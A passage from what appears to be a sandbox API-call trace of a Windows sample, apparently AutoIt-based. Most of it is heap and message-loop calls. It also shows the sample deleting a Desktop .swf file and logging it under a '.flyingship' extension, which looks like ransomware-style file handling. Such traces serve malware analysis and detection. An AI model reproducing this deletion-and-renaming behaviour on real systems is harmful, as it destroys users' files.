hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.315] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0076.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.316] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.316] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.316] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.316] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.316] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.316] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0076.316] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.316] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.318] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.318] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.318] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.318] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFilePart=0x0) returned 0x38 [0076.319] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xca425ba0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0x6b8b38 [0076.319] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ibbdx1qsrydlz.swf")) returned 1 [0076.322] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394ea870, ftCreationTime.dwHighDateTime=0x1d5e43a, ftLastAccessTime.dwLowDateTime=0xdee48600, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0xca425ba0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x110a7, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6iBbdX1qsRyDlZ.swf", cAlternateFileName="6IBBDX~1.SWF")) returned 0 [0076.322] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.322] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.323] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.323] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.323] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.323] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.323] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.323] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.323] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906c0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.323] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0076.324] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.324] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.324] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.324] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0076.324] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.324] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.324] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0076.324] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0076.324] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.324] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0076.324] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x3a9, lpOverlapped=0x0) returned 1 [0076.324] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0076.325] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x3a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.325] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0076.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0076.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x46) returned 0x76f100 [0076.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\n", cchWideChar=70, lpMultiByteStr=0x76f100, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 70 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0076.325] WriteFile (in: hFile=0x128, lpBuffer=0x6d34d8*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d34d8*, lpNumberOfBytesWritten=0x61eef4*=0x45, lpOverlapped=0x0) returned 1 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.325] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.325] CloseHandle (hObject=0x128) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.326] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.327] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0076.327] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.327] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.328] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.328] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0076.328] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.329] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.329] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0076.329] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.329] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.329] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0076.329] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfa0 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.330] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0076.330] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.330] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0076.330] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0076.330] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.330] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.331] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) 